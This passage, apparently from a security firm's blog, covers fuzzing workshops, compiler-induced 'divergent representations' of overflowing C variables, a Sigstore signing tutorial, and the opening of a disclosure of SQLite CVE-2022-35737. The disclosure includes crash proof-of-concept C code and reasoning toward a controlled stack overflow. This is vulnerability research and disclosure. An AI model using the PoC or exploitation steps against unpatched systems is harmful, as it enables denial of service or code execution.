  • Wednesday, November 30: Intro to AMM’s invariants (Justin Jacob)
  • Tuesday, December 6: AMM fuzzing (Justin Jacob)
  • Wednesday, December 14: Intro to advanced DeFi’s invariants (Nat Chin)
  • Wednesday, December 21: Advanced DeFi invariants (Nat Chin)

    You’re welcome to get familiar with our smart contract fuzzer, Echidna, before the workshop. However, it’s not a requirement: the first sessions will cover the basics, while subsequent sessions will be more advanced.

    Each session will be interactive, with hosts available to answer questions as they come in from the livestream chat.

    More workshops on the way

    We’re all about fuzzing, but we think our static analysis tools are pretty cool, too. In 2023, our livestream workshops will cover Slither, our static analysis tool for Solidity. We are also planning sessions that cover other tools from our catalog, such as our static analyzer and linter for Circom (Circomspect), our privacy testing library for deep learning systems (PrivacyRaven), and our interactive documentation on zero-knowledge proof systems and related primitives (ZKDocs). Let us know what tools you’d like to learn more about and we will see you on stream! Let us know which areas you’d like us to stream about in the future!

  • Look out! Divergent representations are everywhere!

    By Andreas Kellas

    Trail of Bits recently published a blog post about a signed integer overflow in certain versions of SQLite that can enable arbitrary code execution and result in a denial of service. While working on proof-of-concept exploits for that vulnerability, we noticed that the compiler’s representation of an important integer variable is semantically different in different parts of the program. These differences result in inconsistent interpretations of the variable when it overflows, which we call “divergent representations.” Once we found an example, we tried to find more—and discovered that divergent representations are actually quite common in compiled C code.

    This blog post examines divergent representations of the same source code variable produced by compiler optimizations. We’ll attempt to define divergent representations and look at the SQLite vulnerability we discovered, which was made easier to exploit by the divergent representation of a source code variable (one exhibiting undefined behavior). We’ll then describe the binary and source code analyses that we used to find more divergent representations in existing open-source codebases. Finally, we’ll share some suggestions for eliminating the risk that a program will be compiled with divergent representations.

    A simple example

    Here’s a simple example of a real-life code pattern that can result in divergent representations:

    int index_of(char *buf, char target) {
        int i;
        for (i=0; buf[i] != target; i++) {}
        return i;
    }
    

    The index_of function receives a character array as input, loops through the array and increments i until it encounters the first target character, and returns the index of that target character. One might expect that buf[index_of(buf, target)] == target, but the evaluation of that statement can depend on the compiler’s optimization level. More specifically, it can depend on the compiler’s handling of undefined behavior when the value of i exceeds the maximum positive int value (INT_MAX, i.e., 0x7fffffff).

    If the target character appears in the first INT_MAX bytes of the buffer, the function will exhibit well-defined behavior, assuming that the platform uses 32-bit integers. If the function scans the first INT_MAX bytes of the array without finding the target character, i will be incremented beyond the maximum representable positive value for the int type, which is undefined behavior.

    So how would the compiler handle that code—that is, code that could exhibit a signed integer overflow at runtime? Of course, because signed integer overflows are undefined behavior, the compiler could choose to do anything at all, including producing “nasal demons.” This is a question about expectations, then: What would we expect a reasonable compiler to do? If i were incremented beyond INT_MAX, where would we expect index_of to try to read a character from memory?

    We might expect the compiler to make one of two seemingly reasonable choices:

    1. Represent i as a signed 32-bit value, causing i to wrap from INT_MAX (a positive value represented as 0x7fffffff) to INT_MIN (a negative value represented as 0x80000000), in which case the function would read the next byte from buf[INT_MIN] as a negative array index
    2. Represent i as an unsigned 64-bit value, causing i to increment to the unsigned value 0x80000000 and the function to read the next byte from buf[0x80000000ul], which is the next contiguous byte in memory

    In either case, if the next character read were the target byte, the index_of function would return (int) 0x80000000, which is INT_MIN (a negative number). However, in case 2, the memory location checked for the target character would not be buf[INT_MIN]. In other words, the expression buf[index_of(buf, target)] == target would not be true if the compiler chose to represent i as an unsigned 64-bit value—and that is exactly how Clang compiles index_of at optimization level -O1 and above:

    index_of(char*, char):              # @index_of(char*, char)
            mov     eax, -1
    .LBB0_1:                            # =>This Inner Loop Header: Depth=1
            inc     eax
            lea     rcx, [rdi + 1]
            cmp     byte ptr [rdi], sil
            mov     rdi, rcx
            jne     .LBB0_1
            ret
    
    

    This is an example of a divergent representation of the same source code variable, i. The value of i returned by the function is represented by addition (inc) on the 32-bit eax register, while the value of i used to access the array buffer is represented by addition (lea) on the 64-bit rdi register. The source code makes no distinction between these two versions of i, as the programmer likely expected that the value used to index into the buffer would be the same one returned by the function. As we’ve shown, though, that is not the case.

    How do divergent representations appear?

    A compiler can apply optimizations to a program to improve the program’s performance. Compilers must ensure the correctness of operations over well-defined inputs, but they can take arbitrary liberties to speed up the execution of undefined behavior. For example, to optimize code on a 64-bit platform, a compiler can replace 32-bit addition with 64-bit addition, because the defined behavior of addition on a 32-bit platform is also defined behavior on a 64-bit platform.

    A divergent representation occurs when a compiler applies program optimizations that cause a single source variable to be represented with different semantics in the output program. The instances of divergent representations that we’ve observed all result from undefined behavior (particularly signed integer overflows). Since programmers shouldn’t write programs with undefined behavior, one could argue that divergent representations are a non-issue. However, we assert that programs ought to have consistent interpretations of the same value even in cases of undefined behavior.

    The divergent representations that we’ve found occur in code that fits the following pattern:

    1. A signed integer variable is declared outside of a loop.
    2. The variable is incremented or decremented in the loop and is allowed to overflow.
    3. The variable is used in the loop to access an array.
    4. The variable is used outside of the loop.

    A 2011 discussion on the LLVM developers mailing list provides fascinating insight into the representation of variables that may overflow, along with the effect that an overflow has on optimizations.

    A wild divergent representation appears!

    We discovered our first divergent representation while we were trying to develop a proof-of-concept exploit for CVE-2022-35737, a vulnerability that we discovered in SQLite. We noticed that our proof-of-concept exploit behaved differently when executed with a debug build of libsqlite3.so (compiled without optimizations) and with the optimized release version of libsqlite3.so; we found that curious, as it seemed to imply that the optimizations had produced semantically different compilations of the same library.

    We dug deeper by disassembling the two versions of the library and analyzing the code near the vulnerability. The differences in the compiled code stem from the source code, specifically the sqlite3_str_vappendf function:

    806 int i, j, k, n, isnull;
        ...
    824 k = precision;
    825 for(i=n=0; k!=0 && (ch=escarg[i])!=0; i++, k--){
    826   if( ch==q )  n++;
    827   if( flag_altform2 && (ch&0xc0)==0xc0 ){
    828     while( (escarg[i+1]&0xc0)==0x80 ){ i++; }
    829   }
    830 }
    

    The figure below shows the disassembled version of the optimized binary:

    In that code snippet, a user input buffer (escarg) is scanned for quotation marks and Unicode characters. At instruction [1a], r10 contains the address of escarg, and rsi is used to index into the buffer to fetch a value from it; the rsi register is set in the previous instruction, which sign-extends the 32-bit edx register. This indexing operation corresponds to the escarg[i] expression on line 825 of the source code. With each loop iteration, edx is incremented at instruction [1b]; thus, the source code variable i is represented as a signed 32-bit integer and can be used as a negative index into escarg.

    However, instruction [2a] shows something different: r10 still contains the address of escarg, but rax+1 is used to index into the buffer in the inner loop that scans for Unicode characters (in the escarg[i+1] expression on line 828 of the source code). Instruction [2b] increments rax as a 64-bit value—and with no 32-bit sign extension—before looping back to [2a]. This version of i is represented as a 64-bit unsigned integer, so when i exceeds the maximum 32-bit signed integer value (0x7fffffff), its next memory access will be at escarg+0x80000000.

    The exploit worked by leveraging the different semantics for i on line 828; these semantics cause i to wrap to a specific small positive value upon an overflow, so it will not be used as a negative index into the escarg buffer on line 825. Details on the exploit are provided in our blog post about the vulnerability and in our proof-of-concept exploits.

    Searching for more divergent representations

    After finding a divergent representation in a popular codebase, we started wondering, “Is it a one-off? Can we find divergent representations in other projects?” We tried two approaches to identifying other potential divergent representations and found more examples in SQLite and libxml2.

    Bottom-up (compiled binary) search

    In our first attempt to find more divergent representations, we took a “bottom-up” approach, looking directly at compiled binaries. We wrote a Binary Ninja script that models the compiled patterns of divergent representations and leverages the abstractions provided by Binary Ninja’s Medium Level Intermediate Language (MLIL) Static Single Assignment (SSA) form. We scanned all instructions in each function’s MLIL representation for any Phi nodes that do the following:

    1. Use a variable that is defined by the Phi node’s defined variable (indicating that the node may affect a loop-control variable)
    2. Define a variable that is used in a downcasting operation (and is thus represented elsewhere as a narrower value)
    3. Use a variable that is assigned multiple sizes (i.e., a variable that may be represented as either 64 bit or 32 bit)
    4. Define a variable that is used in a subsequent 64-bit operation

    If a Phi node matched all of those criteria, we marked it as a potential source of a divergent representation and printed it to the Binary Ninja console terminal for investigation.

    Our script found additional potential divergent representations in both SQLite and libxml2, including in the libxml2 nodes below:

    The first five Phi nodes identified by the Binary Ninja script in its scan of libxml2.so

    The script also identified the following Phi node not pictured above:

    xmlBuildURI@0x7b6c0: rax_33#51 = ϕ(rax_33#50, rax_33#52)

    The addr2line utility indicates that this portion of the binary corresponds to libxml2/uri.c:2085 in the xmlBuildURI function:

       2084 while (bas->path[cur] != 0) {
        2085     while ((bas->path[cur] != 0) && (bas->path[cur] != '/'))
        2086         cur++;
        2087     if (bas->path[cur] == 0)
        2088           break;
        2089
        2090     cur++;
        2091     while (out < cur) { 2092 res->path[out] = bas->path[out];
        2093           out++;
        2094     }
        2095 }
    

    This code pattern appears to be similar to that in the original SQLite code. Note, though, that code compiled with divergent representations will not necessarily be reachable, even with undefined inputs. For example, if there is no way to advance the integer cur beyond the acceptable values for a 32-bit integer, the semantics of the integer in the above code snippet will not diverge.

    Unsurprisingly, when we ran our script on a version of the libraries compiled without optimizations (level -O0), we did not find any divergent representations. That outcome validated our understanding of divergent representations as caused by compiler optimizations.

    Top-down (source code) search

    We also performed a “top-down” search for source code patterns that could produce divergent representations when compiled with optimizations.

    We used CodeQL to create source code queries. These queries identify source code in which the following conditions hold:

    1. A variable is declared outside of a loop.
    2. The variable is incremented in the loop body.
    3. The variable is used to access memory in a statement in the loop body.
    4. The variable is used again after the loop, outside of the loop body.

    We also ran CodeQL with an additional optional condition, querying for cases in which the variable is used to access memory in a conditional statement in the loop, rather than just in its body. That cut down on the number of false positives by eliminating cases in which a loop condition prevents the variable from overflowing. (For example, if i is used in the loop condition i < 10, it won’t overflow, but if the loop condition is buf[i] != x, i may overflow.)

    CodeQL found 20 code patterns that could produce divergent representations in libxml2, two of which (in xmlBuildURI) were also identified by Binary Ninja.

    Note that our top-down and bottom-up searches identified code in which divergent representations may exist; an actual divergence in the program semantics would still require input that caused undefined behavior.

    Preventing divergent representations in compiled programs

    The best way to prevent a divergent representation is to avoid including undefined behavior in a program. That’s not particularly actionable advice, though. It would be even less helpful for us to suggest that programmers avoid writing for and while loops that use variables declared outside of the loop.

    Instead, programmers should use data types that cannot overflow for variables used to count or access arrays (e.g., size_t or uintptr_t instead of int). They should also avoid a practice that is unfortunately common among C programmers: tying error conditions to int functions’ negative return values (e.g., using a return value of -1 to indicate a failure); assuming a larger-scale refactoring is not possible, we recommend using ssize_t instead of int in those cases. Finally, programmers should avoid making any assumptions whatsoever about what a program will do in response to undefined behavior.

    Conclusion

    We cannot make a blanket statement assessing the risks associated with divergent representations. Some, basically unreachable, can be seen as curiosities of undefined behavior—a source of C programming trivia questions that will stump your friends. Others may be more consequential, turning otherwise benign integer overflows into exploitable vulnerabilities, as in the case of our SQLite vulnerability. Our hope is that by describing the phenomena and enabling programmers to identify divergent representations when they appear, we can help the community accurately gauge their severity.

    I’d like to thank my mentor, Peter Goodman, for his expert guidance in the pursuit of vulnerabilities and weird compiler behaviors during my summer internship with Trail of Bits.

    We sign code now

    By William Woodruff

    Sigstore announced the general availability of its free and ecosystem-agnostic software signing service two weeks ago, giving developers a way to sign, verify and protect their software projects and the dependencies they rely on. Trail of Bits is absolutely thrilled to be a part of the project, and we spoke about our work at the inaugural SigstoreCon.

    While the opportunity to speak about Sigstore is amazing, we don’t want to stop there. We think Sigstore is a critical and much-needed step towards accessible software signing, which has become a key component of software supply chain management and security.

    Here are some of the ways Trail of Bits has contributed (and will continue to contribute!) to the overall growth of the Sigstore ecosystem. Strap in!

    What exactly is Sigstore?

    For those unfamiliar: Sigstore is a Linux Foundation project, with contributions from big tech companies and well-regarded academic institutions, focused on a simple mission: to enable code signing and verification for everyone.

    How it goes about doing that is a little more complicated. Sigstore is composed of two core services:

    • Fulcio, a public root certificate authority that issues short-lived signing certificates for authorized identities and commits those certificates to a Certificate Transparency log;
    • Rekor, a transparency and timestamping service for signed artifacts, with strong integrity guarantees.

    Together, Fulcio and Rekor allow programmers to mint short-lived signing certificates, commit to those certificates publicly (making it harder for an attacker to surreptitiously obtain a valid certificate), sign artifacts against those certificates, and then publicly commit to the resulting signatures (again, making it harder for a surreptitious attacker).

    The two services use standard formats and protocols (x509v3 and CT) in order to be interoperable with pre-existing verification schemes and machinery. Because of this, Sigstore is already being slotted into pre-existing workflows: you can use gitsign today to sign git commits using Sigstore, without any modifications to git itself!

    What makes Sigstore special?

    Sigstore is basically a PKI ecosystem, but specialized for short-term signing certificates.

    But what gives Sigstore its special sauce is identity: Fulcio is a root CA, but only for developer or machine identities. More precisely, Fulcio won’t let just any certificate signing request go through: requests must be accompanied by an OpenID Connect (OIDC) token, which attests to an intended identity. That identity is then baked into the signing certificate, allowing anybody to confirm that signature against that certificate.

    When Fulcio receives an OIDC token (which is really just a JSON Web Token), it verifies it against the service it claims to be from using OIDC’s .well-known lookup protocol. A handful of services (with known-high-quality IdPs) are currently supported, among them:

    • GitHub: Individual email identities (corresponding to GitHub accounts) can be attested to, as can machine identities for workflow actions.

    • Google and Microsoft: Individual email identities are supported, including for non-service accounts. In other words: as long as you have a Google or Microsoft account you can attest to the email that’s been linked to it, even if that email is not controlled by Google or Microsoft.

    • Kubernetes: Cloud-based Kubernetes instances (e.g. those provided by AWS, Azure, and Google Cloud) can attest to their cluster identities.

    This identity-first approach turns code-signing on its head: rather than manually establishing trust in the identity behind a public key (which is the norm with PGP-based code signing), a verifier takes a public identity that they trust and simply asks the public signing log whether that identity has signed for the artifact they’d like to use. The end result: strong cryptographic primitives by default, no more brittle key management (on either end), no more broken webs of trust, and a publicly-accessible transparency log that keeps all signing parties honest.

    This model additionally enables powerful misuse-resistant techniques, like “keyless” signing: rather than holding onto long-lived signing keys, users can create a short-lived key, request a certificate for it from Fulcio, and discard it once all signing operations are done. The key never leaves memory and is never reused, drastically reducing the threat (and blast radius) of key theft.

    How do I use Sigstore?

    In the abstract, Sigstore’s “identity-first” model can be a little mind-bending. Here’s an example of how it’s used:

    To get started, we’ll install sigstore-python, the official (and Trail of Bits maintained!) Python implementation of Sigstore:

    $ python -m pip install sigstore

    Once we have it installed, we can use it to sign a local file (you can sign anything, including Python packages or distributions for any language!):

    $ python -m sigstore sign README.md
    Waiting for browser interaction...
    Using ephemeral certificate:
    -----BEGIN CERTIFICATE-----
    MIICwTCCAkegAwIBAgIUZr4/MflYaUb/SSw0CgNj+qLZDhMwCgYIKoZIzj0EAwMw
    NzEVMBMGA1UEChMMc2lnc3RvcmUuZGV2MR4wHAYDVQQDExVzaWdzdG9yZS1pbnRl
    cm1lZGlhdGUwHhcNMjIxMDI4MTYzMjQzWhcNMjIxMDI4MTY0MjQzWjAAMHYwEAYH
    KoZIzj0CAQYFK4EEACIDYgAEVBG9SWAO0pkbhrsKtDUN4Il5OK115yp+Ai5GiDYW
    V1obpF1Ih+/NrtTDN+tdkop0T6Z8eotVjpnyrFpc4TbA6okIZ2eo6oFwRD3tn/mG
    4BFPgm4O4Nvgih+f75M845c1o4IBSTCCAUUwDgYDVR0PAQH/BAQDAgeAMBMGA1Ud
    JQQMMAoGCCsGAQUFBwMDMB0GA1UdDgQWBBRE3hH5uBNf4l/EDxedz0aNNAZX+zAf
    BgNVHSMEGDAWgBTf0+nPViQRlvmo2OkoVaLGLhhkPzAjBgNVHREBAf8EGTAXgRV3
    aWxsaWFtQHlvc3Nhcmlhbi5uZXQwLAYKKwYBBAGDvzABAQQeaHR0cHM6Ly9naXRo
    dWIuY29tL2xvZ2luL29hdXRoMIGKBgorBgEEAdZ5AgQCBHwEegB4AHYACGCS8ChS
    /2hF0dFrJ4ScRWcYrBY9wzjSbea8IgY2b3IAAAGEH3BI7gAABAMARzBFAiEAnrGB
    RDQMHW26GT4H/nCvTBQ7RzBI3ix8rRewG6Bii10CIBnjNsSYBhNB77nNmAheoxxj
    XQWJuQ4n2iQu9FB4AGeKMAoGCCqGSM49BAMDA2gAMGUCMQDaV/a8myBO5yKDBTvS
    fM9ziqC1zOiDrXXg+k4lVg02idTHeukbUZTKsROzOsPSRfUCMCsp30CTXrJPBUfN
    dCxmp44zCE7/yGkNCu+5waxPhOI7mXrfQ7FqzmZ0Z5cs9H/CiA==
    -----END CERTIFICATE-----
    
    Transparency log entry created at index: 6052228
    Signature written to file README.md.sig
    Certificate written to file README.md.crt

    This just works™. Behind the scenes, Sigstore is:

      1. Creating a new local ephemeral keypair;

      2. Retrieving the OIDC identity token, either via an interactive OAuth2 flow or ambient credential detection;

      3. Submitting a Certificate Signing Request to Fulcio, combined with the OIDC token and a proof of possession for the private half of the ephemeral keypair;

      4. Receiving the SCT, Certificate, and intermediate chain from Fulcio, and verifying all three;

      5. Actually signing for the input, using the private key;

      6. Publishing the signature, the input’s hash, and the signing certificate to Rekor;

      7. Saving all necessary verification materials locally, for later distribution and verification.

    The end result: for the input README.md, sigstore-python produces a README.md.crt containing the (PEM-encoded) x509 signing certificate, and a README.md.sig containing the (base64-encoded) signature.

    We can then use any ordinary x509 inspection tool (like openssl x509) to inspect the certificate, and confirm that its extensions contain Sigstore-specific entries for the identity we signed with. Abbreviated to just the certificate’s extensions:

            X509v3 extensions:
                X509v3 Key Usage: critical
                    Digital Signature
                X509v3 Extended Key Usage:
                    Code Signing
                X509v3 Subject Key Identifier:
                    96:96:0F:0F:FB:19:76:15:15:D8:82:BB:8A:04:07:14:E8:85:EA:DA
                X509v3 Authority Key Identifier:
                    DF:D3:E9:CF:56:24:11:96:F9:A8:D8:E9:28:55:A2:C6:2E:18:64:3F
                X509v3 Subject Alternative Name: critical
                    email:william.woodruff@trailofbits.com
                1.3.6.1.4.1.57264.1.1:
                    https://accounts.google.com
                CT Precertificate SCTs:
                    Signed Certificate Timestamp:
                        Version   : v1 (0x0)
                        Log ID    : 08:60:92:F0:28:52:FF:68:45:D1:D1:6B:27:84:9C:45:
                                    67:18:AC:16:3D:C3:38:D2:6D:E6:BC:22:06:36:6F:72
                        Timestamp : Oct 28 16:44:57.279 2022 GMT
                        Extensions: none
                        Signature : ecdsa-with-SHA256
                                    30:44:02:20:1E:FB:5C:97:4D:BB:EC:A2:51:14:9A:A7:
                                    FC:EB:59:9B:10:AA:37:5F:13:E0:D0:D3:ED:4D:3D:36:
                                    18:E1:53:38:02:20:5C:67:61:F4:2E:15:3D:25:14:79:
                                    7F:94:F7:5F:A2:9D:2F:15:71:B9:15:29:AF:7A:9F:3D:
                                    09:77:3B:C1:5E:68
    

    Of course, that’s just human inspection. To actually verify the file against its signing artifacts, we can use sigstore verify:

    # this automatically discovers README.md.crt and README.md.sig
    $ python -m sigstore verify \
        --cert-email william.woodruff@trailofbits.com \
        --cert-oidc-issuer https://accounts.google.com \
        README.md
    OK: README.md

    Again, this just works™:

      1. We verify that the signing certificate (README.md.crt) was signed by the Sigstore certificate chain, linking it back up to the Fulcio root certificate;

      2. We check that the certificate’s SAN and issuer extension correspond to our expected identity (my email address, attested by Google’s IdP)

      3. We verify that the signature (README.md.sig) was produced from the public key attested by the signing certificate;

      4. We check Rekor for a record matching the current verification materials, and then check the resulting record’s Merkle inclusion proof and Signed Entry Timestamp signature;

      5. Finally, we confirm that the signature was integrated into Rekor at a time when the certificate was valid.

    The last two Rekor steps can be additionally visualized through Chainguard’s excellent Rekor web interface:

    Put together, these checks provide strong proof that someone with control over my email identity (i.e., me) signed for an artifact at a specific time, all without either me or the verifying party ever having to directly manage key material!

    The bright present and future

    Now that Sigstore is generally available, we can accelerate our plans to integrate it into ecosystems that currently lack a strong codesigning model. We’ve already made some progress on that, including:

    • CPython itself is now released with Sigstore signatures, created using our very own sigstore-python. You can verify them today, using the exact same sigstore verify command above!

    • A GitHub Action for signing artifacts and automatically attaching signatures to releases, all using GitHub Actions’ built in OIDC provider!

    That said, there’s plenty of work that needs to be done:

    • sigstore-python needs plenty of work to reach a 1.0 stable release, including work toward stabilizing an importable Python API.

    • Critical UX work is needed to ensure that users understand what exactly they’re doing when they verify an identity’s signature.

    • As part of the Sigstore project’s overall commitment to availability and resiliency, we’re working on a conformance test suite that every independent client implementation of Sigstore is expected to pass. We’ll be working with each implementation in the coming months, helping them integrate it into their CI systems.

    • Sigstore is already being used successfully in many ecosystems, but we at Trail of Bits are particularly interested in its use on PyPI and eventual end use in package installers like pip. We’re actively working with the Python packaging community to bring Sigstore support to PyPI!

    Overall, we think Sigstore has an incredibly bright future, and we’re excited to be a part of it. If you’re as excited about Sigstore as we are, then we’d love to hear from you!

    Stranger Strings: An exploitable flaw in SQLite

    By Andreas Kellas

    Trail of Bits is publicly disclosing CVE-2022-35737, which affects applications that use the SQLite library API. CVE-2022-35737 was introduced in SQLite version 1.0.12 (released on October 17, 2000) and fixed in release 3.39.2 (released on July 21, 2022). CVE-2022-35737 is exploitable on 64-bit systems, and exploitability depends on how the program is compiled; arbitrary code execution is confirmed when the library is compiled without stack canaries, but unconfirmed when stack canaries are present, and denial-of-service is confirmed in all cases.

    On vulnerable systems, CVE-2022-35737 is exploitable when large string inputs are passed to the SQLite implementations of the printf functions and when the format string contains the %Q, %q, or %w format substitution types. This is enough to cause the program to crash. We also show that if the format string contains the ! special character to enable unicode character scanning, then it is possible to achieve arbitrary code execution in the worst case, or to cause the program to hang and loop (nearly) indefinitely.

    SQLite is used in nearly everything, from naval warships to smartphones to other programming languages. The open-source database engine has a long history of being very secure: many CVEs that are initially pinned to SQLite actually don’t impact it at all. This blog post describes the vulnerability and our proof-of-concept exploits, which actually does impact certain versions of SQLite. Although this bug may be difficult to reach in deployed applications, it is a prime example of a vulnerability that is made easier to exploit by “divergent representations” that result from applying compiler optimizations to undefined behavior. In an upcoming blog post, we will show how to find instances of the divergent representations bug in binaries and source code.

    Background: Stumbling onto a bug

    A recent blog post presented a vulnerability in PHP that seemed like the perfect candidate for a variant analysis. The blog’s bug manifested when a 64-bit unsigned integer string length was implicitly converted into a 32-bit signed integer when passed as an argument to a function. We formulated a variant analysis for this bug class, found a few bugs, and while most of them were banal, one in particular stood out: a function used for properly escaping quote characters in the PHP PDO SQLite module. And thus began our strange journey into SQLite string formatting.

    SQLite is the most widely deployed database engine, thanks in part to its very permissive licensing and cross-platform, portable design. It is written in C, and can be compiled into a standalone application or a library that exposes APIs for application programmers to use. It seems to be used everywhere—a perception that was reinforced when we tripped right over this vulnerability while hunting for bugs elsewhere.

     static zend_string* sqlite_handle_quoter(pdo_dbh_t *dbh, const zend_string *unquoted, enum pdo_param_type paramtype)
     {
    		char *quoted = safe_emalloc(2, ZSTR_LEN(unquoted), 3);
    		/* TODO use %Q format? */
    		sqlite3_snprintf(2*ZSTR_LEN(unquoted) + 3, quoted, "'%q'", ZSTR_VAL(unquoted));
    		zend_string *quoted_str = zend_string_init(quoted, strlen(quoted), 0);
    		efree(quoted);
    		return quoted_str;
     }
    

    On line 231, an unsigned long (2*ZSTR_LEN(unquoted) + 3) is passed as the first parameter to sqlite3_snprintf, which expects a signed integer. This felt exciting, and we quickly scripted a simple proof of concept. We expected to be able to exploit this bug to produce a poorly formatted string with mismatched quote characters by passing large strings to the function, and possibly achieve SQL injection in vulnerable applications.
    Imagine our surprise when our proof of concept crashed the PHP interpreter:

    There’s a bug in my bug!

    We quickly determined that the crash was occurring in the SQLite shared object, so we naturally took a closer look at the sqlite3_snprintf function.

    SQLite implements custom versions of the printf family of functions and adds the new format specifiers %Q, %q, and %w, which are designed to properly escape quote characters in the input string in order to make safe SQL queries. For example, we wrote the following code snippet to properly use sqlite3_snprintf with the format specifier %q to output a string where all single-quote characters are escaped with another single quote. Additionally, the entire string is wrapped in a leading and trailing single quote, the way the PHP quote function intends:

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <sqlite3.h>
    
    int main(int argc, char *argv[]) {
    
        char src[] = "hello, \'world\'!";
        char dst[sizeof(src) + 4];  // Add 4 to account for extra quotes.
    
        sqlite3_snprintf(sizeof(dst), dst, "'%q'", src);
    
        printf("src: %s\n", src);
        printf("dst: %s\n", dst);
        return 0;
    }
    

    sqlite3_snprintf properly wraps the original string in single quotes, and escapes any existing single-quotes in the input string.

    Next, we changed our program to imitate the behavior of the PHP script by passing the same large 2GB string directly to sqlite3_snprintf:

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <sqlite3.h>
    
    #define STR_LEN ((0x100000001 - 3) / 2)
    
    int main(int argc, char *argv[]) {
    
        char *src = calloc(1, STR_LEN + 1); // Account for NULL byte.
        memset(src, 'a', STR_SIZE);
        char *dst = calloc(1, STR_LEN + 3); // Account for extra quotes and NULL byte.
    
        sqlite3_snprintf(2*STR_LEN + 3, dst, "'%q'", src);
    
        printf("src: %s\n", src);
        printf("dst: %s\n", dst);
        return 0;
    }
    

    A crash! We seem to have found a culprit: large inputs to sqlite3_snprintf. Thus began a journey down a rabbit hole where we discovered that SQLite does not properly handle large strings in parts of its custom implementations of the printf family of functions. Even further down the rabbit hole, we discovered that a compiler optimization made it easier to exploit the SQLite vulnerability.

    The Vulnerability

    The custom SQLite printf family of functions internally calls the function sqlite3_str_vappendf, which handles string formatting. Large string inputs to the sqlite3_str_vappendf function can cause signed integer overflow when the format substitution type is %q, %Q, or %w.

    sqlite3_str_vappendf scans the input fmt string and formats the variable-sized argument list according to the format substitution types specified in the fmt string. In the case statement for handling the %q, %Q, and %w format specifiers (src/printf.c:L803-850), the function scans the input string for quote characters in order to calculate the correct number of output bytes (lines 824-828) and then copies the input to the output buffer and adds quotation characters as required (lines 842-845). In the snippet below, escarg points to the input string:

     
    case etSQLESCAPE:           /* %q: Escape ' characters */
    case etSQLESCAPE2:          /* %Q: Escape ' and enclose in '...' */
    case etSQLESCAPE3: {        /* %w: Escape " characters */
      int i, j, k, n, isnull;
      int needQuote;
      char ch;
      char q = ((xtype==etSQLESCAPE3)?'"':'\'');   /* Quote character */
      char *escarg;
    
      if( bArgList ){
        escarg = getTextArg(pArgList);
      }else{
        escarg = va_arg(ap,char*);
      }
      isnull = escarg==0;
      if( isnull ) escarg = (xtype==etSQLESCAPE2 ? "NULL" : "(NULL)");
      /* For %q, %Q, and %w, the precision is the number of bytes (or
      ** characters if the ! flags is present) to use from the input.
      ** Because of the extra quoting characters inserted, the number
      ** of output characters may be larger than the precision.
      */
      k = precision;
      for(i=n=0; k!=0 && (ch=escarg[i])!=0; i++, k--){
        if( ch==q )  n++;
        if( flag_altform2 && (ch&0xc0)==0xc0 ){
          while( (escarg[i+1]&0xc0)==0x80 ){ i++; }
        }
      }
      needQuote = !isnull && xtype==etSQLESCAPE2;
      n += i + 3;
      if( n>etBUFSIZE ){
        bufpt = zExtra = printfTempBuf(pAccum, n);
        if( bufpt==0 ) return;
      }else{
        bufpt = buf;
      }
      j = 0;
      if( needQuote ) bufpt[j++] = q;
      k = i;
      for(i=0; i<k; i++){
        bufpt[j++] = ch = escarg[i];
        if( ch==q ) bufpt[j++] = ch;
      }
      if( needQuote ) bufpt[j++] = q;
      bufpt[j] = 0;
      length = j;
      goto adjust_width_for_utf8;
    }
    

    The number of quote characters (int n) and the total number of bytes in the input string (int i) are used to calculate the maximum total bytes required in the output buffer (L832: n+=i+3). This calculation can cause n to overflow to a negative value, for example, when the int type is 32-bits and n=0 and i=0x7ffffffe. This is possible when the input string contains 0x7ffffffe ASCII characters with no quote characters.

    Lines 833-838 are supposed to ensure that a buffer of sufficient size is allocated to receive the formatted bytes of the input string. If the output string size could exceed etBUFSIZE bytes (70 bytes, by default), the program dynamically allocates a buffer of sufficient size to hold the output string (line 834). Otherwise, the program expects the output buffer to be smaller than the stack-allocated buffer of etBUFSIZE bytes, and the small stack-allocated buffer is used instead (line 837). At least i bytes are copied from the input into the destination buffer. When n overflows to a negative value, the stack-allocated buffer is used, even though i can exceed etBUFSIZE, resulting in a stack buffer overflow when the input string is copied to the output buffer (line 843).

    The Exploits

    But can we do more interesting things with this vulnerability than just crash the target program? Of course!

    The input string must be very large to reach the bug condition where n overflows to a negative value at line 832. The challenge is that when the input string is very large, the variable i (which counts the number of bytes in the input string) is also very large, resulting in a lot of data written to the stack and causing the program to crash at line 843. We set out to determine whether it is possible to cause n to overflow on line 832, but to also cause i to stay small and positive at line 843 and thus avoid crashing. We revisit the loop where i is computed, from lines 824 to 830:

    /* For %q, %Q, and %w, the precision is the number of bytes (or
    ** characters if the ! flags is present) to use from the input.
    ** Because of the extra quoting characters inserted, the number
    ** of output characters may be larger than the precision.
    */
    k = precision;
    for(i=n=0; k!=0 && (ch=escarg[i])!=0; i++, k--){
      if( ch==q )  n++;
      if( flag_altform2 && (ch&0xc0)==0xc0 ){
        while( (escarg[i+1]&0xc0)==0x80 ){ i++; }
      }
    }
    

    The purpose of this loop is to scan the input string (escarg) for quote characters (q), incrementing n each time one is found. If our goal is to cause a controlled stack buffer overflow that does not crash the program, then the loop must terminate with values such that n+=i+3 results in a value less than etBUFSIZE (a macro defined to 70) and i must be a relatively small positive integer that is greater than etBUFSIZE.

    The k and flag_altform2 variables in the loop are related to two features of the SQLite printf functions: optional precision and the optional alternate format flag 2, which are both influenced by the format string. In the example below, including ! in the format string sets flag_altform2=true, and the .80 sets precision=80:

       snprintf3_snprintf(len, buf, “‘%!.80q’”, src) 

    When precision is not set in the format string, it is set by default to -1. Therefore, by default int k=-1, and the loop decrements k with each iteration, so the outer loop can execute 232 times before k=0.

    So far in our analysis of CVE-2022-35737, we’ve made few assumptions about the format string passed to the vulnerable function, other than that it contains one of the vulnerable format specifiers (%Q, %q, or %w). To progress further in our exploitation, we need to make one more assumption: that the flag_altform2 is set by providing a ! character in the format string.

    When flag_altform2=true, it is possible to increment i in the inner loop without decrementing k by including unicode characters in the input string. With this in mind, perhaps we can include enough quote characters in the input to set n to a large positive integer, and then cause i to increment in the inner loop until it wraps back around to a small positive integer, and then somehow exit the loop. But how will i behave when it overflows beyond the maximum signed integer value? Will it wrap back to 0, or to a negative value? Is it possible to tell by just looking at the source code? No, it isn’t; this is undefined behavior, so we must inspect the compiled binary to see what choices the compiler made to represent i.

    Divergent Representations in the compiled binary

